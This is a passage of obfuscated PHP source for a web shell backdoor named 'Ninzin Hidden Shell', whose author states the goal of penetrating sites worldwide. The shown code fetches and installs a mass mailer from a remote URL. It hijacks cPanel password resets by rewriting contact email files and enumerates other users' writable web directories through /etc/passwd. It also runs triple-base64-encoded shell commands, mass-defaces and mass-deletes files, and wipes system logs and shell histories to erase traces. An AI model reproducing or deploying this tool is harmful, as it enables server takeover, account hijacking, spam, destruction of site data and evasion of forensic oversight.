true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("leaf.php")) { echo "<center><a href='{$full}/leaf.php' target='_blank'><font color='green'> ===>>> Mailer Login <<<=== </a></font></center><br/>"; } else { if (phpmailer("https://raw.githubusercontent.com/0xNix/leafmailer/main/leaf.php", "leaf.php")) { echo "<center><a href='{$full}/leaf.php' target='_blank'><font color='green'> ===>>> Mailer Login <<<=== </a></font></center><br/>"; } else { echo "<center><font color=red>Gagal Membuat File Mailer</font></center><br/>"; } } die; } elseif (isset($_GET["cpcrack"])) { echo "<center><br/><h2 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h2>
\x9\x9<form method="POST">\xa \x9<div align="center" class="form-group">
\x9<input type="email" name="email" class="up" style="width: 450px; cursor: pointer; border-color: #fff" placeholder="Masukan Email Lu Ngab..."/><br/>
\x9\x9\x9\x9<br><input type="submit" name="submit" class="up" style="width: 450px; cursor: pointer; border-color: #fff" value="Send"/>
\x9\x9 </div>
\x9 </form></center><br>"; if (isset($_POST["submit"])) { $user = get_current_user(); $site = $_SERVER["HTTP_HOST"]; $ips = getenv("REMOTE_ADDR"); $email = $_POST["email"]; $wr = "email:" . $email; $f = @fopen("/home/" . $user . "/.cpanel/contactinfo", "w"); fwrite($f, $wr); fclose($f); $f = fopen("/home/" . $user . "/.contactinfo", "w"); fwrite($f, $wr); fclose($f); $parm = $site . ":2082/resetpass?start=1"; echo "<br/><center>Url: " . $parm . "</center>"; echo "<br/><center>Username: " . $user . "</center>"; echo "<br/><center>Success Reset To: " . $email . "</center><br/><br/>"; } die; } elseif (isset($_GET["jumping"])) { $i = 0; $dir = $_GET["path"]; echo "<div class='card container'>"; if (preg_match("/hsphere/", $dir)) { $urls = explode("
", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($urls as $url) { $url = str_replace(array("http://", "www."), '', strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc, "r"); while ($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/{$user}"; if (is_dir($dir_user) === true) { $url_user = $dir_user . "/" . $url; if (is_readable($url_user)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$url_user}'><font color=#0046FF>{$url_user}</font></a>"; if (is_writable($url_user)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$url_user}'><font color=#0046FF>{$url_user}</font></a>"; } echo $jrw . "<br>"; } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } else { echo "<center>
\x9\x9\x9\x9\x9 <form method="post">
\x9 List Domains: <br>
\x9\x9\x9\x9\x9 <textarea name="url" class="form-control">"; $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt", "r"); while ($getss = fgets($fp)) { echo $getss; } echo "</textarea><br>\xa\x9 \x9\x9 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">\xa \x9\x9\x9 </form></center>"; } } elseif (preg_match("/vhosts/", $dir)) { $urls = explode("
\xa", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($urls as $url) { $web_vh = "/var/www/vhosts/{$url}/httpdocs"; if (is_dir($web_vh) === true) { if (is_readable($web_vh)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$web_vh}'><font color=#0046FF>{$web_vh}</font></a>"; if (is_writable($web_vh)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$web_vh}'><font color=#0046FF>{$web_vh}</font></a>"; } echo $jrw . "<br>"; } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } else { echo "<center>\xa\x9\x9\x9\x9 <form method="post">
\x9 \x9\x9\x9 List Domains: <br>
\x9 \x9\x9 <textarea name="url" class="form-control">"; bing("ip:{$ip}"); echo "</textarea><br>\xa\x9\x9\x9 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">\xa\xa\x9 </form></center>"; } } else { echo "<pre>"; $etc = "/etc/passwd"; $opening = @fopen("{$etc}", "r") or die("<center><font color=red>Can't read /etc/passwd</font></center><br/>"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "<font color=red>Can't read /etc/passwd</font><br/>"; } else { preg_match_all("/(.*?):x:/", $passwd, $user_jumping); foreach ($user_jumping[1] as $user_pro_jump) { $user_jumping_dir = "/home/{$user_pro_jump}/public_html"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$user_jumping_dir}'><font color=#0046FF>{$user_jumping_dir}</font></a>"; if (is_writable($user_jumping_dir)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$user_jumping_dir}'><font color=#0046FF>{$user_jumping_dir}</font></a>"; } echo $jrw; if (function_exists("posix_getpwuid")) { $domain_jump = file_get_contents("/etc/named.conf"); if ($domain_jump == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/{$dj}")); $user_jumping_url = $user_jumping_url["name"]; if ($user_jumping_url == $user_pro_jump) { echo " => ( <u>{$dj}</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } echo "</div><br/>"; die; } elseif (isset($_GET["about"])) { echo "<center><div class='card text-center bg-light about'>\xa\x9\x9\x9 <h2 class='card-header'><font face='Bungee Outline' size='6'>{ Ninzin Hidden Shell }</font></h2>\xa \x9\x9<div class='card-body'>
<div><img src='https://i.ibb.co/ZSksTyG/ninzinjp.webp' style='position: relative; border-radius: 50%; width='220' height='220'></div>\xa \x9\x9 <h4 class='card-text'>{ Ninzin Private Shell } hi everyone my name is ninzin, okay my goal is to make this backdoor shell so that it can penetrate all sites in the world xD...</h4> <h4 class='card-text'>and thanks to <a href='https://t.me/xzourt'><font color='yellow'>@xzourt</font></a> for helping me in making this shell. Happy hacking guys!</h4>\xa <audio controls='controls' src='https://d.top4top.io/m_2972fka851.mp3'></audio>
\x9 \x9</div>\xa \x9\x9\x9<div class='card-footer'>
\x9\x9\x9 \x9<p class='card-text'>Copyright 2024 { Ninzin.jp }</p>
\x9 \x9\x9</div>\xa\x9\x9 </div><br/></center>"; die; } elseif (isset($_GET["kill"])) { if (@unlink(preg_replace("!(d+)s.*!", '', __FILE__))) { die("<center><br><center><h2>Shell Removed!!!</h2><br>Goodbye Ninzin :(</center></center>"); } else { echo "<center>unlink failed!</center>"; } } goto d5Nl3; zmjIK: echo "<a class="destroy_table" href="?path=" . $lokasi . "&phpinfo=headshoot"><i class="fab fa-php"></i> PHP Info</a>"; goto Njo2H; lm9_W: echo "</center></td>\xa<td><center><form method="POST" action="?pilihan&path={$lokasi}">
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="pilihan">
<input type="hidden" name="path" value="{$lokasi}/path">\xa<button type='submit' class='btf' name='pilih' value='folder'><i class='fa fa-folder' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='file'><i class='fa fa-file' style='color: #fff'></i></button>\xa</form></center>"; goto qC3XU; eZqHv: echo "Server IP : <font color=gold>" . ipserv() . "</font> / Your IP : <font color=gold>" . $_SERVER["REMOTE_ADDR"] . "</font><br>"; goto YSYov; s5p3N: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File <i>" . basename($_POST["path"]) . "</i> Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { if (!isset($_POST["cemod"])) { if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">
Pe" . "rmi" . "ss" . "ion : <input name="perm" type="text" class="up" size="4" maxlength="4" value="" . $sub($spr("%o", $fp($_POST["path"])), -4) . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } else { $cm = @$chm($_POST["path"], $ocd($_POST["perm"])); if ($cm == true) { green("Change Permission Success !"); if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">\xa Pe" . "rmi" . "ss" . "ion : <input name="perm" type="text" class="up" size="4" maxlength="4" value="" . $sub($spr("%o", $fp($_POST["path"])), -4) . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } else { red("Change Permission Failed !"); if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">\xa Pe" . "rmi" . "ss" . "ion : <input name="perm" type="text" class="up" size="4" maxlength="4" value="" . $sub($spr("%o", $fp($_POST["path"])), -4) . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahtanggal") { if (isset($_POST["tanggale"])) { $stt = "st" . "rtot" . "ime"; $tch = "t" . "ou" . "ch"; $tanggale = $stt($_POST["tanggal"]); if (@$tch($_POST["path"], $tanggale) === true) { green("Change Da" . "te Succ" . "ess !"); $det = "da" . "te"; $ftm = "fi" . "le" . "mti" . "me"; $b = $det("d F Y H:i:s", $ftm($_POST["path"])); if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">\xa New Da" . "te : <input name="tanggal" type="text" class="up" size="20" value="" . $b . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="ubahtanggal">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="tanggale" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } else { red("Fai" . "led to Cha" . "nge Da" . "te !"); } } else { $det = "da" . "te"; $ftm = "fi" . "le" . "mti" . "me"; $b = $det("d F Y H:i:s", $ftm($_POST["path"])); if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">
New Da" . "te : <input name="tanggal" type="text" class="up" size="20" value="" . $b . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="ubahtanggal">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="tanggale" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
New Name : <input name="newname" type="text" class="up" size="20" value="" . htmlspecialchars($bsn($_POST["path"])) . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="gantinama">
<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>
</form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">\xa <textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="edit">\xa <input type="submit" value="Edit File" name="gasedit" />
</form><br>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "dunlut") { dunlut($_POST["path"]); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "unzip") { unzip($_POST["path"], $lokasi); } elseif (isset($_GET["upload"])) { echo "<center>Upload File : "; echo "<form enctype="multipart/form-data" method="post">\xa<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]\xa<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br><br>\xaUpload File From Link :<br>\xa<input type="text" name="darilink" class="up" placeholder="https://404notfound.id/upload.txt"> <input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">\xa<br><br>403 Upload File<br>
<input type="file" id="datanya" onchange="setfilename(this.value); loadFile(this.files[0])"/>
<input type="hidden" name="bepasnama" id="namanya">
<textarea style="display: none" id="bepasdata" name="bepasdata"></textarea>\xa<input type="submit" name="bepas" value="Upload" class="up" style="cursor: pointer; border-color: #fff">
</form><br><br></center>"; } elseif (isset($_GET["komend"])) { echo "<center>"; echo "<form method="post" onsubmit="document.getElementById('komendnya').value = btoa(btoa(btoa(document.getElementById('komendnya').value)))">
" . @get_current_user() . "@" . ipserv() . ":~ $ <input type="text" name="komend" id="komendnya" style="background-color: #1f1f1f; color: #fff">\xa <input type="submit" name="eksekomend" value=" >> " class="up" style="cursor: pointer; border-color: #fff">\xa </form><br>"; if (isset($_POST["eksekomend"])) { ekse($_POST["komend"], $lokasi); } echo "</center>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "fo" . "ld" . "er") { if ($isw("./") || $ird("./")) { $loke = $_GET["path"]; if (isset($_POST["buatfolder"])) { $buatfolder = $mkd($loke . "/" . $_POST["fo" . "lde" . "rba" . "ru"]); if ($buatfolder == true) { green("Folder <b>" . htmlspecialchars($_POST["fo" . "lde" . "rba" . "ru"]) . "</b> Created !"); echo "<form method="post"><center>Folder : <input type="text" name="fo" . "lde" . "rba" . "ru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfolder" value="Create folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="folder"></form>"; } else { red("Failed to Create folder !"); echo "<form method="post"><center>Folder : <input type="text" name="fo" . "lde" . "rba" . "ru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfolder" value="Create folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="folder"></form>"; } } else { echo "<form method="post"><center>Folder : <input type="text" name="fo" . "lde" . "rba" . "ru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfolder" value="Create folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . ""><input type="hidden" name="pilih" value="folder"></form>"; } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "fi" . "le") { if ($isw("./") || $isr("./")) { $loke = $_GET["path"]; if (isset($_POST["buatfi" . "le"])) { $buatf = $fpt($loke . "/" . $_POST["fi" . "lebaru"], ''); if ($fxt($loke . "/" . $_POST["fi" . "lebaru"])) { green("File <b>" . htmlspecialchars($_POST["fi" . "lebaru"]) . "</b> Created !"); echo "<form method="post"><center>Filename : <input type="text" name="fi" . "lebaru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfi" . "le" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="fi" . "le"></form>"; } else { red("Failed to Create File !"); echo "<form method="post"><center>Filename : <input type="text" name="fi" . "lebaru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfi" . "le" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="fi" . "le"></form>"; } } else { echo "<form method="post"><center>Filename : <input type="text" name="fi" . "lebaru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfi" . "le" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . ""><input type="hidden" name="pilih" value="fi" . "le"></form>"; } } } elseif (isset($_GET["massdeface"])) { function sabun_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "<center>[<font color=green>DONE</font>] {$lokasi}</center><br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc, $namafile, $isi_script); } } } } } } function sabun_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "<center>[<font color=green>DONE</font>] {$lokasi}<br></center>"; file_put_contents($lokasi, $isi_script); } } } } } } if (isset($_POST["start"])) { if ($_POST["tipe_sabun"] == "mahal") { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); echo "</div>"; } elseif ($_POST["tipe_sabun"] == "murah") { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_biasa($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); echo "</div>"; } } else { echo "<center>"; echo "<form method='post'>
<font style='text-decoration: underline;'>Tipe Deface:</font><br>
<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>\xa <font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='{$lokasi}' class='up' style='width: 450px; cursor: pointer; border-color: #fff'><br>\xa\x9<font style='text-decoration: underline;'>Filename:</font><br>\xa <input type='text' name='d_file' value='Ninzin.php' class='up' style='width: 450px; cursor: pointer; border-color: #fff'><br>\xa <font style='text-decoration: underline;'>Index File:</font><br>
\x9<textarea name='script' class='up' style='width: 450px; height: 200px; color:white; border-color:#fff;'>Kissed By Ninzin</textarea><br>\xa\x9<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
</form></center><br>"; } } elseif (isset($_GET["massdelete"])) { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { if (file_exists("{$dir}/{$namafile}")) { unlink("{$dir}/{$namafile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namafile}")) { unlink('' . dirname($dir) . "/{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($lokasi)) { echo "<center>[<font color=red>DELETED</font>] {$lokasi}<br></center>"; unlink($lokasi); $idx = hapus_massal($dirc, $namafile); } } } } } } } if (isset($_POST["start"])) { echo "<div style='margin: 5px auto; padding: 5px'>"; hapus_massal($_POST["d_dir"], $_POST["d_file"]); echo "</div>"; } else { echo "<center>"; echo "<form method='post'>
\x9<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='{$lokasi}' class='up' style='width: 450px; cursor: pointer; border-color: #fff'><br>\xa <font style='text-decoration: underline;'>Filename:</font><br>
\x9<input type='text' name='d_file' value='index.php' class='up' style='width: 450px; cursor: pointer; border-color: #fff'><br>
<br><input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
</form></center><br>"; } } elseif (isset($_GET["phpinfo"])) { echo "<hr><br><center>"; echo "<center><h2>Server Php Info</h2></center>"; echo phpinfo(); echo "<center><hr><br></center>"; } elseif (isset($_GET["delete_logs"])) { echo "<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>"; echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>"; exec("rm -rf /tmp/logs"); exec("rm -rf /root/.ksh_history"); exec("rm -rf /root/.bash_history"); exec("rm -rf /root/.bash_logout"); exec("rm -rf /usr/local/apache/logs"); exec("rm -rf /usr/local/apache/log"); exec("rm -rf /var/apache/logs"); exec("rm -rf /var/apache/log"); exec("rm -rf /var/run/utmp"); exec("rm -rf /var/logs"); exec("rm -rf /var/log"); exec("rm -rf /var/adm"); exec("rm -rf /etc/wtmp"); exec("rm -rf /etc/utmp"); exec("rm -rf /var/log/lastlog"); exec("rm -rf /var/log/wtmp"); shell_exec("rm -rf /tmp/logs"); shell_exec("rm -rf /root/.ksh_history"); shell_exec("rm -rf /root/.bash_history"); shell_exec("rm -rf /root/.bash_logout"); shell_exec("rm -rf /usr/local/apache/logs"); shell_exec("rm -rf /usr/local/apache/log"); shell_exec("rm -rf /var/apache/logs"); shell_exec("rm -rf /var/apache/log"); shell_exec("rm -rf /var/run/utmp"); shell_exec("rm -rf /var/logs"); shell_exec("rm -rf /var/log"); shell_exec("rm -rf /var/adm"); shell_exec("rm -rf /etc/wtmp"); shell_exec("rm -rf /etc/utmp"); shell_exec("rm -rf /var/log/lastlog"); shell_exec("rm -rf /var/log/wtmp"); passthru("rm -rf /tmp/logs"); passthru("rm -rf /root/.ksh_history"); passthru("rm -rf /root/.bash_history"); passthru("rm -rf /root/.bash_logout"); passthru("rm -rf /usr/local/apache/logs"); passthru("rm -rf /usr/local/apache/log"); passthru("rm -rf /var/apache/logs"); passthru("rm -rf /var/apache/log"); passthru("rm -rf /var/run/utmp"); passthru("rm -rf /var/logs"); passthru("rm -rf /var/log"); passthru("rm -rf /var/adm"); passthru("rm -rf /etc/wtmp"); passthru("rm -rf /etc/utmp"); passthru("rm -rf /var/log/lastlog"); passthru("rm -rf /var/log/wtmp"); system("rm -rf /tmp/logs"); sleep(2); echo "<br>Deleting .../tmp/logs "; sleep(2); system("rm -rf /root/.bash_history"); sleep(2); echo "<p>Deleting .../root/.bash_history </p>"; system("rm -rf /root/.ksh_history"); sleep(2); echo "<p>Deleting .../root/.ksh_history </p>"; system("rm -rf /root/.bash_logout"); sleep(2); echo "<p>Deleting .../root/.bash_logout </p>"; system("rm -rf /usr/local/apache/logs"); sleep(2); echo "<p>Deleting .../usr/local/apache/logs </p>"; system("rm -rf /usr/local/apache/log"); sleep(2); echo "<p>Deleting .../usr/local/apache/log </p>"; system("rm -rf /var/apache/logs"); sleep(2); echo "<p>Deleting .../var/apache/logs </p>"; system("rm -rf /var/apache/log"); sleep(2); echo "<p>Deleting .../var/apache/log </p>"; system("rm -rf /var/run/utmp"); sleep(2); echo "<p>Deleting .../var/run/utmp </p>"; system("rm -rf /var/logs"); sleep(2); echo "<p>Deleting .../var/logs </p>"; system("rm -rf /var/log"); sleep(2); echo "<p>Deleting .../var/log </p>"; system("rm -rf /var/adm"); sleep(2); echo "<p>Deleting .../var/adm </p>"; system("rm -rf /etc/wtmp"); sleep(2); echo "<p>Deleting .../etc/wtmp </p>"; system("rm -rf /etc/utmp"); sleep(2); echo "<p>Deleting .../etc/utmp </p>"; system("rm -rf /var/log/lastlog"); sleep(2); echo "<p>Deleting .../var/log/lastlog </p>"; system("rm -rf /var/log/wtmp"); sleep(2); echo "<p>Deleting .../var/log/wtmp </p>"; sleep(4); echo "<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server"; echo "</td></tr></table>"; } elseif (isset($_GET["delete_logs"])) { echo "<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>"; echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>"; exec("rm -rf /tmp/logs"); exec("rm -rf /root/.ksh_history"); exec("rm -rf /root/.bash_history"); exec("rm -rf /root/.bash_logout"); exec("rm -rf /usr/local/apache/logs"); exec("rm -rf /usr/local/apache/log"); exec("rm -rf /var/apache/logs"); exec("rm -rf /var/apache/log"); exec("rm -rf /var/run/utmp"); exec("rm -rf /var/logs"); exec("rm -rf /var/log"); exec("rm -rf /var/adm"); exec("rm -rf /etc/wtmp"); exec("rm -rf /etc/utmp"); exec("rm -rf {$HISTFILE}"); exec("rm -rf /var/log/lastlog"); exec("rm -rf /var/log/wtmp"); shell_exec("rm -rf /tmp/logs"); shell_exec("rm -rf /root/.ksh_history"); shell_exec("rm -rf /root/.bash_history"); shell_exec("rm -rf /root/.bash_logout"); shell_exec("rm -rf /usr/local/apache/logs"); shell_exec("rm -rf /usr/local/apache/log"); shell_exec("rm -rf /var/apache/logs"); shell_exec("rm -rf /var/apache/log"); shell_exec("rm -rf /var/run/utmp"); shell_exec("rm -rf /var/logs"); shell_exec("rm -rf /var/log"); shell_exec("rm -rf /var/adm"); shell_exec("rm -rf /etc/wtmp"); shell_exec("rm -rf /etc/utmp"); shell_exec("rm -rf {$HISTFILE}"); shell_exec("rm -rf /var/log/lastlog"); shell_exec("rm -rf /var/log/wtmp"); passthru("rm -rf /tmp/logs"); passthru("rm -rf /root/.ksh_history"); passthru("rm -rf /root/.bash_history"); passthru("rm -rf /root/.bash_logout"); passthru("rm -rf /usr/local/apache/logs"); passthru("rm -rf /usr/local/apache/log"); passthru("rm -rf /var/apache/logs"); passthru("rm -rf /var/apache/log"); passthru("rm -rf /var/run/utmp"); passthru("rm -rf /var/logs"); passthru("rm -rf /var/log"); passthru("rm -rf /var/adm"); passthru("rm -rf /etc/wtmp"); passthru("rm -rf /etc/utmp"); passthru("rm -rf {$HISTFILE}"); passthru("rm -rf /var/log/lastlog"); passthru("rm -rf /var/log/wtmp"); system("rm -rf /tmp/logs"); sleep(2); echo "<center><br>Deleting .../tmp/logs</center>"; sleep(2); system("rm -rf /root/.bash_history"); sleep(2); echo "<center><p>Deleting .../root/.bash_history </p></center>"; system("rm -rf /root/.ksh_history"); sleep(2); echo "<center><p>Deleting .../root/.ksh_history </p></center>"; system("rm -rf /root/.bash_logout"); sleep(2); echo "<center><p>Deleting .../root/.bash_logout </p></center>"; system("rm -rf /usr/local/apache/logs"); sleep(2); echo "<center><p>Deleting .../usr/local/apache/logs </p></center>"; system("rm -rf /usr/local/apache/log"); sleep(2); echo "<center><p>Deleting .../usr/local/apache/log </p></center>"; system("rm -rf /var/apache/logs"); sleep(2); echo "<center><p>Deleting .../var/apache/logs </p></center>"; system("rm -rf /var/apache/log"); sleep(2); echo "<center><p>Deleting .../var/apache/log </p></center>"; system("rm -rf /var/run/utmp"); sleep(2); echo "<center><p>Deleting .../var/run/utmp </p></center>"; system("rm -rf /var/logs"); sleep(2); echo "<center><p>Deleting .../var/logs </p></center>"; system("rm -rf /var/log"); sleep(2); echo "<center><p>Deleting .../var/log </p></center>"; system("rm -rf /var/adm"); sleep(2); echo "<center><p>Deleting .../var/adm </p></center>"; system("rm -rf /etc/wtmp"); sleep(2); echo "<center><p>Deleting .../etc/wtmp </p></center>"; system("rm -rf /etc/utmp"); sleep(2); echo "<center><p>Deleting .../etc/utmp </p></center>"; system("rm -rf /var/log/lastlog"); sleep(2); echo "<center><p>Deleting .../var/log/lastlog </p></center>"; system("rm -rf /var/log/wtmp"); 